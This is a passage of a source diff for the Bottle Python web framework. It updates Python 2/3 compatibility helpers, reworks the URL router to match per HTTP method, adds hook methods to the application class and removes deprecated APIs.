opts.server.startswith('eventlet'): + import eventlet + eventlet.monkey_patch() + + +if __name__ == '__main__': + _cli_patch(sys.argv) + +############################################################################### +# Imports and Python 2/3 unification ########################################### +############################################################################### + import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\ - os, re, subprocess, sys, tempfile, threading, time, urllib, warnings + os, re, tempfile, threading, time, warnings +from types import FunctionType from datetime import date as datedate, datetime, timedelta from tempfile import TemporaryFile from traceback import format_exc, print_exc +from unicodedata import normalize -try: from json import dumps as json_dumps, loads as json_lds -except ImportError: # pragma: no cover - try: from simplejson import dumps as json_dumps, loads as json_lds +# inspect.getargspec was removed in Python 3.6, use +# Signature-based version where we can (Python 3.3+) +try: + from inspect import signature + def getargspec(func): + params = signature(func).parameters + args, varargs, keywords, defaults = [], None, None, [] + for name, param in params.items(): + if param.kind == param.VAR_POSITIONAL: + varargs = name + elif param.kind == param.VAR_KEYWORD: + keywords = name + else: + args.append(name) + if param.default is not param.empty: + defaults.append(param.default) + return (args, varargs, keywords, tuple(defaults) or None) +except ImportError: + from inspect import getargspec + +try: + from simplejson import dumps as json_dumps, loads as json_lds +except ImportError: # pragma: no cover + try: + from json import dumps as json_dumps, loads as json_lds except 
ImportError: - try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds + try: + from django.utils.simplejson import dumps as json_dumps, loads as json_lds except ImportError: + def json_dumps(data): - raise ImportError("JSON support requires Python 2.6 or simplejson.") + raise ImportError( + "JSON support requires Python 2.6 or simplejson.") + json_lds = json_dumps - - # We now try to fix 2.5/2.6/3.1/3.2 incompatibilities. # It ain't pretty but it works... Sorry for the mess. -py = sys.version_info -py3k = py >= (3,0,0) -py25 = py < (2,6,0) -py31 = (3,1,0) <= py < (3,2,0) +py = sys.version_info +py3k = py >= (3, 0, 0) +py25 = py < (2, 6, 0) +py31 = (3, 1, 0) <= py < (3, 2, 0) # Workaround for the missing "as" keyword in py3k. -def _e(): return sys.exc_info()[1] +def _e(): + return sys.exc_info()[1] # Workaround for the "print is a keyword/function" Python 2/3 dilemma # and a fallback for mod_wsgi (resticts stdout/err attribute access) @@ -84,12 +143,16 @@ if py3k: from collections import MutableMapping as DictMixin import pickle from io import BytesIO + from configparser import ConfigParser, Error as ConfigParserError basestring = str unicode = str json_loads = lambda s: json_lds(touni(s)) callable = lambda x: hasattr(x, '__call__') imap = map -else: # 2.x + + def _raise(*a): + raise a[0](a[1]).with_traceback(a[2]) +else: # 2.x import httplib import thread from urlparse import urljoin, SplitResult as UrlSplitResult @@ -98,57 +161,75 @@ else: # 2.x from itertools import imap import cPickle as pickle from StringIO import StringIO as BytesIO + from ConfigParser import SafeConfigParser as ConfigParser, \ + Error as ConfigParserError if py25: msg = "Python 2.5 support may be dropped in future versions of Bottle." warnings.warn(msg, DeprecationWarning) from UserDict import DictMixin - def next(it): return it.next() + + def next(it): + return it.next() + bytes = str - else: # 2.6, 2.7 + else: # 2.6, 2.7 from collections import MutableMapping as DictMixin + unicode = unicode json_loads = json_lds + eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec')) + # Some helpers for string/byte handling def tob(s, enc='utf8'): return s.encode(enc) if isinstance(s, unicode) else bytes(s) + + def touni(s, enc='utf8', err='strict'): - return s.decode(enc, err) if isinstance(s, bytes) else unicode(s) + if isinstance(s, bytes): + return s.decode(enc, err) + else: + return unicode(s or ("" if s is None else s)) + + tonat = touni if py3k else tob # 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense). # 3.1 needs a workaround. if py31: from io import TextIOWrapper - class NCTextIOWrapper(TextIOWrapper): - def close(self): pass # Keep wrapped buffer open. -# File uploads (which are implemented as empty FiledStorage instances...) -# have a negative truth value. That makes no sense, here is a fix. -class FieldStorage(cgi.FieldStorage): - def __nonzero__(self): return bool(self.list or self.file) - if py3k: __bool__ = __nonzero__ + class NCTextIOWrapper(TextIOWrapper): + def close(self): + pass # Keep wrapped buffer open. + # A bug in functools causes it to break if the wrapper is an instance method def update_wrapper(wrapper, wrapped, *a, **ka): - try: functools.update_wrapper(wrapper, wrapped, *a, **ka) - except AttributeError: pass - - + try: + functools.update_wrapper(wrapper, wrapped, *a, **ka) + except AttributeError: + pass # These helpers are used at module level and need to be defined first. 
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense. -def depr(message): + +def depr(message, strict=False): warnings.warn(message, DeprecationWarning, stacklevel=3) -def makelist(data): # This is just to handy - if isinstance(data, (tuple, list, set, dict)): return list(data) - elif data: return [data] - else: return [] + +def makelist(data): # This is just too handy + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] class DictProperty(object): - ''' Property that maps to a key in a local dict-like attribute. ''' + """ Property that maps to a key in a local dict-like attribute. """ + def __init__(self, attr, key=None, read_only=False): self.attr, self.key, self.read_only = attr, key, read_only @@ -173,11 +254,12 @@ class DictProperty(object): class cached_property(object): - ''' A property that is only computed once per instance and then replaces + """ A property that is only computed once per instance and then replaces itself with an ordinary attribute. Deleting the attribute resets the - property. ''' + property. """ def __init__(self, func): + self.__doc__ = getattr(func, '__doc__') self.func = func def __get__(self, obj, cls): @@ -187,7 +269,8 @@ class cached_property(object): class lazy_attribute(object): - ''' A property that caches itself to the class object. ''' + """ A property that caches itself to the class object. """ + def __init__(self, func): functools.update_wrapper(self, func, updated=[]) self.getter = func @@ -197,11 +280,6 @@ class lazy_attribute(object): setattr(cls, self.__name__, value) return value - - - - - ############################################################################### # Exceptions and Events ######################################################## ############################################################################### @@ -211,11 +289,6 @@ class BottleException(Exception): """ A base class for exceptions used by bottle. """ pass - - - - - ############################################################################### # Routing ###################################################################### ############################################################################### @@ -229,19 +302,31 @@ class RouteReset(BottleException): """ If raised by a plugin or request handler, the route is reset and all plugins are re-applied. """ -class RouterUnknownModeError(RouteError): pass + +class RouterUnknownModeError(RouteError): + + pass class RouteSyntaxError(RouteError): - """ The route parser found something not supported by this router """ + """ The route parser found something not supported by this router. """ class RouteBuildError(RouteError): - """ The route could not been built """ + """ The route could not be built. """ + + +def _re_flatten(p): + """ Turn all capturing groups in a regular expression pattern into + non-capturing groups. """ + if '(' not in p: + return p + return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))', lambda m: m.group(0) if + len(m.group(1)) % 2 else m.group(1) + '(?:', p) class Router(object): - ''' A Router is an ordered collection of route->target pairs. It is used to + """ A Router is an ordered collection of route->target pairs. It is used to efficiently match WSGI requests against a number of routes and return the first target that satisfies the request. The target may be anything, usually a string, ID or callable object. 
A route consists of a path-rule @@ -250,177 +335,212 @@ class Router(object): The path-rule is either a static path (e.g. `/contact`) or a dynamic path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax and details on the matching order are described in docs:`routing`. - ''' + """ default_pattern = '[^/]+' - default_filter = 're' - #: Sorry for the mess. It works. Trust me. - rule_syntax = re.compile('(\\\\*)'\ - '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\ - '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\ - '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') + default_filter = 're' + + #: The current CPython regexp implementation does not allow more + #: than 99 matching groups per regular expression. + _MAX_GROUPS_PER_PATTERN = 99 def __init__(self, strict=False): - self.rules = {} # A {rule: Rule} mapping - self.builder = {} # A rule/name->build_info mapping - self.static = {} # Cache for static routes: {path: {method: target}} - self.dynamic = [] # Cache for dynamic routes. See _compile() + self.rules = [] # All rules in order + self._groups = {} # index of regexes to find them in dyna_routes + self.builder = {} # Data structure for the url builder + self.static = {} # Search structure for static routes + self.dyna_routes = {} + self.dyna_regexes = {} # Search structure for dynamic routes #: If true, static routes are no longer checked first. self.strict_order = strict - self.filters = {'re': self.re_filter, 'int': self.int_filter, - 'float': self.float_filter, 'path': self.path_filter} - - def re_filter(self, conf): - return conf or self.default_pattern, None, None - - def int_filter(self, conf): - return r'-?\d+', int, lambda x: str(int(x)) - - def float_filter(self, conf): - return r'-?[\d.]+', float, lambda x: str(float(x)) - - def path_filter(self, conf): - return r'.+?', None, None + self.filters = { + 're': lambda conf: (_re_flatten(conf or self.default_pattern), + None, None), + 'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))), + 'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))), + 'path': lambda conf: (r'.+?', None, None) + } def add_filter(self, name, func): - ''' Add a filter. The provided function is called with the configuration + """ Add a filter. The provided function is called with the configuration string as parameter and must return a (regexp, to_python, to_url) tuple. - The first element is a string, the last two are callables or None. ''' + The first element is a string, the last two are callables or None. """ self.filters[name] = func - def parse_rule(self, rule): - ''' Parses a rule into a (name, filter, conf) token stream. If mode is - None, name contains a static rule part. 
''' + rule_syntax = re.compile('(\\\\*)' + '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)' + '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)' + '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') + + def _itertokens(self, rule): offset, prefix = 0, '' for match in self.rule_syntax.finditer(rule): prefix += rule[offset:match.start()] g = match.groups() - if len(g[0])%2: # Escaped wildcard + if len(g[0]) % 2: # Escaped wildcard prefix += match.group(0)[len(g[0]):] offset = match.end() continue - if prefix: yield prefix, None, None - name, filtr, conf = g[1:4] if not g[2] is None else g[4:7] - if not filtr: filtr = self.default_filter - yield name, filtr, conf or None + if prefix: + yield prefix, None, None + name, filtr, conf = g[4:7] if g[2] is None else g[1:4] + yield name, filtr or 'default', conf or None offset, prefix = match.end(), '' if offset <= len(rule) or prefix: - yield prefix+rule[offset:], None, None + yield prefix + rule[offset:], None, None def add(self, rule, method, target, name=None): - ''' Add a new route or replace the target for an existing route. ''' - if rule in self.rules: - self.rules[rule][method] = target - if name: self.builder[name] = self.builder[rule] - return - - target = self.rules[rule] = {method: target} - - # Build pattern and other structures for dynamic routes - anons = 0 # Number of anonymous wildcards - pattern = '' # Regular expression pattern - filters = [] # Lists of wildcard input filters - builder = [] # Data structure for the URL builder + """ Add a new rule or replace the target for an existing rule. """ + anons = 0 # Number of anonymous wildcards found + keys = [] # Names of keys + pattern = '' # Regular expression pattern with named groups + filters = [] # Lists of wildcard input filters + builder = [] # Data structure for the URL builder is_static = True - for key, mode, conf in self.parse_rule(rule): + + for key, mode, conf in self._itertokens(rule): if mode: is_static = False + if mode == 'default': mode = self.default_filter mask, in_filter, out_filter = self.filters[mode](conf) - if key: - pattern += '(?P<%s>%s)' % (key, mask) - else: + if not key: pattern += '(?:%s)' % mask - key = 'anon%d' % anons; anons += 1 + key = 'anon%d' % anons + anons += 1 + else: + pattern += '(?P<%s>%s)' % (key, mask) + keys.append(key) if in_filter: filters.append((key, in_filter)) builder.append((key, out_filter or str)) elif key: pattern += re.escape(key) builder.append((None, key)) + self.builder[rule] = builder if name: self.builder[name] = builder if is_static and not self.strict_order: - self.static[self.build(rule)] = target + self.static.setdefault(method, {}) + self.static[method][self.build(rule)] = (target, None) return - def fpat_sub(m): - return m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:' - flat_pattern = re.sub(r'(\\*)(\(\?P<[^>]*>|\((?!\?))', fpat_sub, pattern) - try: - re_match = re.compile('^(%s)$' % pattern).match + re_pattern = re.compile('^(%s)$' % pattern) + re_match = re_pattern.match except re.error: - raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e())) + raise RouteSyntaxError("Could not add Route: %s (%s)" % + (rule, _e())) - def match(path): - """ Return an url-argument dictionary. 
""" - url_args = re_match(path).groupdict() - for name, wildcard_filter in filters: - try: - url_args[name] = wildcard_filter(url_args[name]) - except ValueError: - raise HTTPError(400, 'Path has wrong format.') - return url_args + if filters: - try: - combined = '%s|(^%s$)' % (self.dynamic[-1][0].pattern, flat_pattern) - self.dynamic[-1] = (re.compile(combined), self.dynamic[-1][1]) - self.dynamic[-1][1].append((match, target)) - except (AssertionError, IndexError): # AssertionError: Too many groups - self.dynamic.append((re.compile('(^%s$)' % flat_pattern), - [(match, target)])) - return match + def getargs(path): + url_args = re_match(path).groupdict() + for name, wildcard_filter in filters: + try: + url_args[name] = wildcard_filter(url_args[name]) + except ValueError: + raise HTTPError(400, 'Path has wrong format.') + return url_args + elif re_pattern.groupindex: + + def getargs(path): + return re_match(path).groupdict() + else: + getargs = None + + flatpat = _re_flatten(pattern) + whole_rule = (rule, flatpat, target, getargs) + + if (flatpat, method) in self._groups: + if DEBUG: + msg = 'Route <%s %s> overwrites a previously defined route' + warnings.warn(msg % (method, rule), RuntimeWarning) + self.dyna_routes[method][ + self._groups[flatpat, method]] = whole_rule + else: + self.dyna_routes.setdefault(method, []).append(whole_rule) + self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1 + + self._compile(method) + + def _compile(self, method): + all_rules = self.dyna_routes[method] + comborules = self.dyna_regexes[method] = [] + maxgroups = self._MAX_GROUPS_PER_PATTERN + for x in range(0, len(all_rules), maxgroups): + some = all_rules[x:x + maxgroups] + combined = (flatpat for (_, flatpat, _, _) in some) + combined = '|'.join('(^%s$)' % flatpat for flatpat in combined) + combined = re.compile(combined).match + rules = [(target, getargs) for (_, _, target, getargs) in some] + comborules.append((combined, rules)) def build(self, _name, *anons, **query): - ''' Build an URL by filling the wildcards in a rule. ''' + """ Build an URL by filling the wildcards in a rule. """ builder = self.builder.get(_name) - if not builder: raise RouteBuildError("No route with that name.", _name) + if not builder: + raise RouteBuildError("No route with that name.", _name) try: - for i, value in enumerate(anons): query['anon%d'%i] = value - url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder]) - return url if not query else url+'?'+urlencode(query) + for i, value in enumerate(anons): + query['anon%d' % i] = value + url = ''.join([f(query.pop(n)) if n else f for (n, f) in builder]) + return url if not query else url + '?' + urlencode(query) except KeyError: raise RouteBuildError('Missing URL argument: %r' % _e().args[0]) def match(self, environ): - ''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). ''' - path, targets, urlargs = environ['PATH_INFO'] or '/', None, {} - if path in self.static: - targets = self.static[path] - else: - for combined, rules in self.dynamic: - match = combined.match(path) - if not match: continue - getargs, targets = rules[match.lastindex - 1] - urlargs = getargs(path) if getargs else {} - break + """ Return a (target, url_args) tuple or raise HTTPError(400/404/405). 
""" + verb = environ['REQUEST_METHOD'].upper() + path = environ['PATH_INFO'] or '/' - if not targets: - raise HTTPError(404, "Not found: " + repr(environ['PATH_INFO'])) - method = environ['REQUEST_METHOD'].upper() - if method in targets: - return targets[method], urlargs - if method == 'HEAD' and 'GET' in targets: - return targets['GET'], urlargs - if 'ANY' in targets: - return targets['ANY'], urlargs - allowed = [verb for verb in targets if verb != 'ANY'] - if 'GET' in allowed and 'HEAD' not in allowed: - allowed.append('HEAD') - raise HTTPError(405, "Method not allowed.", Allow=",".join(allowed)) + if verb == 'HEAD': + methods = ['PROXY', verb, 'GET', 'ANY'] + else: + methods = ['PROXY', verb, 'ANY'] + + for method in methods: + if method in self.static and path in self.static[method]: + target, getargs = self.static[method][path] + return target, getargs(path) if getargs else {} + elif method in self.dyna_regexes: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + target, getargs = rules[match.lastindex - 1] + return target, getargs(path) if getargs else {} + + # No matching route found. Collect alternative methods for 405 response + allowed = set([]) + nocheck = set(methods) + for method in set(self.static) - nocheck: + if path in self.static[method]: + allowed.add(verb) + for method in set(self.dyna_regexes) - allowed - nocheck: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + allowed.add(method) + if allowed: + allow_header = ",".join(sorted(allowed)) + raise HTTPError(405, "Method not allowed.", Allow=allow_header) + + # No matching route and no alternative method found. We give up + raise HTTPError(404, "Not found: " + repr(path)) class Route(object): - ''' This class wraps a route callback along with route specific metadata and + """ This class wraps a route callback along with route specific metadata and configuration and applies Plugins on demand. It is also responsible for turing an URL path rule into a regular expression usable by the Router. - ''' + """ - def __init__(self, app, rule, method, callback, name=None, - plugins=None, skiplist=None, **config): + def __init__(self, app, rule, method, callback, + name=None, + plugins=None, + skiplist=None, **config): #: The application this route is installed to. self.app = app - #: The path-rule string (e.g. ``/wiki/:page``). + #: The path-rule string (e.g. ``/wiki/<page>``). self.rule = rule #: The HTTP method as a string (e.g. ``GET``). self.method = method @@ -435,38 +555,25 @@ class Route(object): #: Additional keyword arguments passed to the :meth:`Bottle.route` #: decorator are stored in this dictionary. Used for route-specific #: plugin configuration and meta-data. - self.config = ConfigDict(config) - - def __call__(self, *a, **ka): - depr("Some APIs changed to return Route() instances instead of"\ - " callables. Make sure to use the Route.call method and not to"\ - " call Route instances directly.") - return self.call(*a, **ka) + self.config = ConfigDict().load_dict(config) @cached_property def call(self): - ''' The route callback with all plugins applied. This property is - created on demand and then cached to speed up subsequent requests.''' + """ The route callback with all plugins applied. This property is + created on demand and then cached to speed up subsequent requests.""" return self._make_callback() def reset(self): - ''' Forget any cached values. The next time :attr:`call` is accessed, - all plugins are re-applied. 
''' + """ Forget any cached values. The next time :attr:`call` is accessed, + all plugins are re-applied. """ self.__dict__.pop('call', None) def prepare(self): - ''' Do all on-demand work immediately (useful for debugging).''' + """ Do all on-demand work immediately (useful for debugging).""" self.call - @property - def _context(self): - depr('Switch to Plugin API v2 and access the Route object directly.') - return dict(rule=self.rule, method=self.method, callback=self.callback, - name=self.name, app=self.app, config=self.config, - apply=self.plugins, skip=self.skiplist) - def all_plugins(self): - ''' Yield all Plugins affecting this route. ''' + """ Yield all Plugins affecting this route. """ unique = set() for p in reversed(self.app.plugins + self.plugins): if True in self.skiplist: break @@ -481,24 +588,49 @@ class Route(object): for plugin in self.all_plugins(): try: if hasattr(plugin, 'apply'): - api = getattr(plugin, 'api', 1) - context = self if api > 1 else self._context - callback = plugin.apply(callback, context) + callback = plugin.apply(callback, self) else: callback = plugin(callback) - except RouteReset: # Try again with changed configuration. + except RouteReset: # Try again with changed configuration. return self._make_callback() if not callback is self.callback: update_wrapper(callback, self.callback) return callback + def get_undecorated_callback(self): + """ Return the callback. If the callback is a decorated function, try to + recover the original function. """ + func = self.callback + func = getattr(func, '__func__' if py3k else 'im_func', func) + closure_attr = '__closure__' if py3k else 'func_closure' + while hasattr(func, closure_attr) and getattr(func, closure_attr): + attributes = getattr(func, closure_attr) + func = attributes[0].cell_contents + + # in case of decorators with multiple arguments + if not isinstance(func, FunctionType): + # pick first FunctionType instance from multiple arguments + func = filter(lambda x: isinstance(x, FunctionType), + map(lambda x: x.cell_contents, attributes)) + func = list(func)[0] # py3 support + return func + + def get_callback_args(self): + """ Return a list of argument names the callback (most likely) accepts + as keyword arguments. If the callback is a decorated function, try + to recover the original function before inspection. """ + return getargspec(self.get_undecorated_callback())[0] + + def get_config(self, key, default=None): + """ Lookup a config field and return its value, first checking the + route.config, then route.app.config.""" + for conf in (self.config, self.app.config): + if key in conf: return conf[key] + return default + def __repr__(self): - return '<%s %r %r>' % (self.method, self.rule, self.callback) - - - - - + cb = self.get_undecorated_callback() + return '<%s %r %r>' % (self.method, self.rule, cb) ############################################################################### # Application Object ########################################################### @@ -515,31 +647,75 @@ class Bottle(object): """ def __init__(self, catchall=True, autojson=True): - #: If true, most exceptions are caught and returned as :exc:`HTTPError` - self.catchall = catchall + #: A :class:`ConfigDict` for app specific configuration. 
+ self.config = ConfigDict() + self.config._on_change = functools.partial(self.trigger_hook, 'config') + self.config.meta_set('autojson', 'validate', bool) + self.config.meta_set('catchall', 'validate', bool) + self.config['catchall'] = catchall + self.config['autojson'] = autojson #: A :class:`ResourceManager` for application files self.resources = ResourceManager() - #: A :class:`ConfigDict` for app specific configuration. - self.config = ConfigDict() - self.config.autojson = autojson - - self.routes = [] # List of installed :class:`Route` instances. - self.router = Router() # Maps requests to :class:`Route` instances. + self.routes = [] # List of installed :class:`Route` instances. + self.router = Router() # Maps requests to :class:`Route` instances. self.error_handler = {} # Core plugins - self.plugins = [] # List of installed plugins. - self.hooks = HooksPlugin() - self.install(self.hooks) - if self.config.autojson: + self.plugins = [] # List of installed plugins. + if self.config['autojson']: self.install(JSONPlugin()) self.install(TemplatePlugin()) + #: If true, most exceptions are caught and returned as :exc:`HTTPError` + catchall = DictProperty('config', 'catchall') + + __hook_names = 'before_request', 'after_request', 'app_reset', 'config' + __hook_reversed = 'after_request' + + @cached_property + def _hooks(self): + return dict((name, []) for name in self.__hook_names) + + def add_hook(self, name, func): + """ Attach a callback to a hook. Three hooks are currently implemented: + + before_request + Executed once before each request. The request context is + available, but no routing has happened yet. + after_request + Executed once after each request regardless of its outcome. + app_reset + Called whenever :meth:`Bottle.reset` is called. + """ + if name in self.__hook_reversed: + self._hooks[name].insert(0, func) + else: + self._hooks[name].append(func) + + def remove_hook(self, name, func): + """ Remove a callback from a hook. """ + if name in self._hooks and func in self._hooks[name]: + self._hooks[name].remove(func) + return True + + def trigger_hook(self, __name, *args, **kwargs): + """ Trigger a hook and return a list of results. """ + return [hook(*args, **kwargs) for hook in self._hooks[__name][:]] + + def hook(self, name): + """ Return a decorator that attaches a callback to a hook. See + :meth:`add_hook` for details.""" + + def decorator(func): + self.add_hook(name, func) + return func + + return decorator def mount(self, prefix, app, **options): - ''' Mount an application (:class:`Bottle` or plain WSGI) to a specific + """ Mount an application (:class:`Bottle` or plain WSGI) to a specific URL prefix. Example:: root_app.mount('/admin/', admin_app) @@ -549,10 +725,7 @@ class Bottle(object): :param app: an instance of :class:`Bottle` or a WSGI application. All other parameters are passed to the underlying :meth:`route` call. 
- ''' - if isinstance(app, basestring): - prefix, app = app, prefix - depr('Parameter order of Bottle.mount() changed.') # 0.10 + """ segments = [p for p in prefix.split('/') if p] if not segments: raise ValueError('Empty path prefix.') @@ -561,19 +734,24 @@ class Bottle(object): def mountpoint_wrapper(): try: request.path_shift(path_depth) - rs = BaseResponse([], 200) - def start_response(status, header): + rs = HTTPResponse([]) + + def start_response(status, headerlist, exc_info=None): + if exc_info: + _raise(*exc_info) rs.status = status - for name, value in header: rs.add_header(name, value) + for name, value in headerlist: + rs.add_header(name, value) return rs.body.append + body = app(request.environ, start_response) - body = itertools.chain(rs.body, body) - return HTTPResponse(body, rs.status_code, **rs.headers) + rs.body = itertools.chain(rs.body, body) if rs.body else body + return rs finally: request.path_shift(-path_depth) options.setdefault('skip', True) - options.setdefault('method', 'ANY') + options.setdefault('method', 'PROXY') options.setdefault('mountpoint', {'prefix': prefix, 'target': app}) options['callback'] = mountpoint_wrapper @@ -582,20 +760,20 @@ class Bottle(object): self.route('/' + '/'.join(segments), **options) def merge(self, routes): - ''' Merge the routes of another :class:`Bottle` application or a list of + """ Merge the routes of another :class:`Bottle` application or a list of :class:`Route` objects into this application. The routes keep their 'owner', meaning that the :data:`Route.app` attribute is not - changed. ''' + changed. """ if isinstance(routes, Bottle): routes = routes.routes for route in routes: self.add_route(route) def install(self, plugin): - ''' Add a plugin to the list of plugins and prepare it for being + """ Add a plugin to the list of plugins and prepare it for being applied to all routes of this application. A plugin may be a simple decorator or an object that implements the :class:`Plugin` API. - ''' + """ if hasattr(plugin, 'setup'): plugin.setup(self) if not callable(plugin) and not hasattr(plugin, 'apply'): raise TypeError("Plugins must be callable or implement .apply()") @@ -604,10 +782,10 @@ class Bottle(object): return plugin def uninstall(self, plugin): - ''' Uninstall plugins. Pass an instance to remove a specific plugin, a type + """ Uninstall plugins. Pass an instance to remove a specific plugin, a type object to remove all plugins that match that type, a string to remove all plugins with a matching ``name`` attribute or ``True`` to remove all - plugins. Return the list of removed plugins. ''' + plugins. Return the list of removed plugins. """ removed, remove = [], plugin for i, plugin in list(enumerate(self.plugins))[::-1]: if remove is True or remove is plugin or remove is type(plugin) \ @@ -618,27 +796,28 @@ class Bottle(object): if removed: self.reset() return removed - def run(self, **kwargs): - ''' Calls :func:`run` with the same parameters. ''' - run(self, **kwargs) - def reset(self, route=None): - ''' Reset all routes (force plugins to be re-applied) and clear all + """ Reset all routes (force plugins to be re-applied) and clear all caches. If an ID or route object is given, only that specific route - is affected. ''' + is affected. 
""" if route is None: routes = self.routes elif isinstance(route, Route): routes = [route] else: routes = [self.routes[route]] - for route in routes: route.reset() + for route in routes: + route.reset() if DEBUG: - for route in routes: route.prepare() - self.hooks.trigger('app_reset') + for route in routes: + route.prepare() + self.trigger_hook('app_reset') def close(self): - ''' Close the application and all installed plugins. ''' + """ Close the application and all installed plugins. """ for plugin in self.plugins: if hasattr(plugin, 'close'): plugin.close() - self.stopped = True + + def run(self, **kwargs): + """ Calls :func:`run` with the same parameters. """ + run(self, **kwargs) def match(self, environ): """ Search for a matching route and return a (:class:`Route` , urlargs) @@ -653,21 +832,26 @@ class Bottle(object): return urljoin(urljoin('/', scriptname), location) def add_route(self, route): - ''' Add a route object, but do not change the :data:`Route.app` - attribute.''' + """ Add a route object, but do not change the :data:`Route.app` + attribute.""" self.routes.append(route) self.router.add(route.rule, route.method, route, name=route.name) if DEBUG: route.prepare() - def route(self, path=None, method='GET', callback=None, name=None, - apply=None, skip=None, **config): + def route(self, + path=None, + method='GET', + callback=None, + name=None, + apply=None, + skip=None, **config): """ A decorator to bind a function to a request URL. Example:: - @app.route('/hello/:name') + @app.route('/hello/<name>') def hello(name): return 'Hello %s' % name - The ``:name`` part is a wildcard. See :class:`Router` for syntax + The ``<name>`` part is a wildcard. See :class:`Router` for syntax details. :param path: Request path or a list of paths to listen to. If no @@ -689,16 +873,19 @@ class Bottle(object): if callable(path): path, callback = None, path plugins = makelist(apply) skiplist = makelist(skip) + def decorator(callback): - # TODO: Documentation and tests if isinstance(callback, basestring): callback = load(callback) for rule in makelist(path) or yieldroutes(callback): for verb in makelist(method): verb = verb.upper() - route = Route(self, rule, verb, callback, name=name, - plugins=plugins, skiplist=skiplist, **config) + route = Route(self, rule, verb, callback, + name=name, + plugins=plugins, + skiplist=skiplist, **config) self.add_route(route) return callback + return decorator(callback) if callback else decorator def get(self, path=None, method='GET', **options): @@ -717,62 +904,60 @@ class Bottle(object): """ Equals :meth:`route` with a ``DELETE`` method parameter. """ return self.route(path, method, **options) + def patch(self, path=None, method='PATCH', **options): + """ Equals :meth:`route` with a ``PATCH`` method parameter. """ + return self.route(path, method, **options) + def error(self, code=500): """ Decorator: Register an output handler for a HTTP error code""" + def wrapper(handler): self.error_handler[int(code)] = handler return handler + return wrapper - def hook(self, name): - """ Return a decorator that attaches a callback to a hook. Three hooks - are currently implemented: - - - before_request: Executed once before each request - - after_request: Executed once after each request - - app_reset: Called whenever :meth:`reset` is called. - """ - def wrapper(func): - self.hooks.add(name, func) - return func - return wrapper - - def handle(self, path, method='GET'): - """ (deprecated) Execute the first matching route callback and return - the result. 
:exc:`HTTPResponse` exceptions are caught and returned. - If :attr:`Bottle.catchall` is true, other exceptions are caught as - well and returned as :exc:`HTTPError` instances (500). - """ - depr("This method will change semantics in 0.10. Try to avoid it.") - if isinstance(path, dict): - return self._handle(path) - return self._handle({'PATH_INFO': path, 'REQUEST_METHOD': method.upper()}) - def default_error_handler(self, res): return tob(template(ERROR_PAGE_TEMPLATE, e=res)) def _handle(self, environ): + path = environ['bottle.raw_path'] = environ['PATH_INFO'] + if py3k: + environ['PATH_INFO'] = path.encode('latin1').decode('utf8', 'ignore') + + def _inner_handle(): + # Maybe pass variables as locals for better performance? + try: + route, args = self.router.match(environ) + environ['route.handle'] = route + environ['bottle.route'] = route + environ['route.url_args'] = args + return route.call(**args) + except HTTPResponse: + return _e() + except RouteReset: + route.reset() + return _inner_handle() + except (KeyboardInterrupt, SystemExit, MemoryError): + raise + except Exception: + if not self.catchall: raise + stacktrace = format_exc() + environ['wsgi.errors'].write(stacktrace) + return HTTPError(500, "Internal Server Error", _e(), stacktrace) + try: + out = None environ['bottle.app'] = self request.bind(environ) response.bind() - route, args = self.router.match(environ) - environ['route.handle'] = route - environ['bottle.route'] = route - environ['route.url_args'] = args - return route.call(**args) - except HTTPResponse: - return _e() - except RouteReset: - route.reset() - return self._handle(environ) - except (KeyboardInterrupt, SystemExit, MemoryError): - raise - except Exception: - if not self.catchall: raise - stacktrace = format_exc() - environ['wsgi.errors'].write(stacktrace) - return HTTPError(500, "Internal Server Error", _e(), stacktrace) + self.trigger_hook('before_request') + out = _inner_handle() + return out; + finally: + if isinstance(out, HTTPResponse): + out.apply(response) + self.trigger_hook('after_request') def _cast(self, out, peek=None): """ Try to convert the parameter into something WSGI compatible and set @@ -789,7 +974,7 @@ class Bottle(object): # Join lists of byte or unicode strings. Mixed lists are NOT supported if isinstance(out, (tuple, list))\ and isinstance(out[0], (bytes, unicode)): - out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' + out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' # Encode unicode strings if isinstance(out, unicode): out = out.encode(response.charset) @@ -802,7 +987,8 @@ class Bottle(object): # TODO: Handle these explicitly in handle() or make them iterable. 
